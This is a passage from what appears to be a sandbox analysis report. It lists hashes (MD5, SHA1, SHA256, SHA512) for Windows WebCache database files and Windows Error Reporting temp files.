| SHA512 | 97a1f7525d250f789de313b0b8b94fcf58d74fc88eabaa3e0a349c1590203036bbf1ea3db16fb966532195066b055304a21004cc16243c770a88e5b00f0f313a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
| MD5 | 97e21c3ace4c909e979d057e48b0511b |
| SHA1 | f9abd1563142bc87241792a6bff9266b000477f9 |
| SHA256 | e47e6b4f3b270f2492a6dc3a787b5d757677e806021cc0c7406b9b68c4928215 |
| SHA512 | 72eb2f4cb72a868fddeebe7d3206a6df581dc415ffb39552b16b805feef268c6e32295f61c9125699d95728812704438272c3e61097db6454b13455358af2580 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
| MD5 | 92a5394c98970c2df97518ccfc941abc |
| SHA1 | ae03e5eb972afe00e87028bf85c0cf82734748dd |
| SHA256 | 4e13d98ce827d7c819bf3c4a9f2710375700d4be1dd86e70020fa8fd6a849f6b |
| SHA512 | 3a0fee76337d78dbeca41301158bb33d2a3f78fb4c82a27c973d4dfd52ec072561568f2721a661f28afc26765cbd846cca270005c0e388c9fb88f4ffe5928d5f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
| MD5 | fc15ddc1aa5e610bdb3810289a075271 |
| SHA1 | ff298ce2d03f8e42eb7eba3fd94310a94148dcae |
| SHA256 | 7fe3aa950904d80928e76f7ced4c581374da94acf39546ec5e69921ee943f87c |
| SHA512 | e2ead360c0244bedbd3dd5b5d200567aa3b0b1d7424440e0ff6132a4408e38d2c53ea20391863680fb54b7aa5aa7999ae4b6e70ee597676a4be5f96e4804435c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm
| MD5 | 3694b353dbe71a48a6dcb93f2725f228 |
| SHA1 | 43822178e3d40fbf92093b57ae178019fba8f6ec |
| SHA256 | e8dda600070ff70908f0f315720406011f205656af8cab423660931a2ae8bdcd |
| SHA512 | 8614cf3c1e79350ed721ee6e991d1613e09d5edc2f5896f66cf3aae372a796cfd18320fbb6d3f0de707c6931bae3a90786e8a8a658239837858868f11aedea59 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE31.tmp.txt
| MD5 | 24f9a61651b91727b24e7f71d73be9f3 |
| SHA1 | 10234bdd506470ea68780abe131aaf9fc6e1a5c1 |
| SHA256 | d4721814f7bf31176a91686d5b0272931912b4ada5d689c9b720d263b65330eb |
| SHA512 | 8e0074da8c72fc169edfeb162d992ac4d9f421cd354b20acb59255c9dd7049366d83e02a8407666d16f79a895f23fcdaedb1f1a28aafb9f7e23af0beaa9480b2 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDF2.tmp.csv
| MD5 | f49fd4a936729b7d48d000e0d25b1749 |
| SHA1 | c6086c51d7d491a071441a553475f107afdf5ad6 |
| SHA256 | 413f00c12a845c63b27793846e1131fa0592c2033eacfe5c8d3cb00fbc340106 |
| SHA512 | 0055710db934ab84003612e7482ebc08bbf446af1a2bf0b4166f673bdd8b51a8f9ce6d9f7d6b57d8f6db06b7f345898b610f03dc97fffacf95e3ab148e612953 |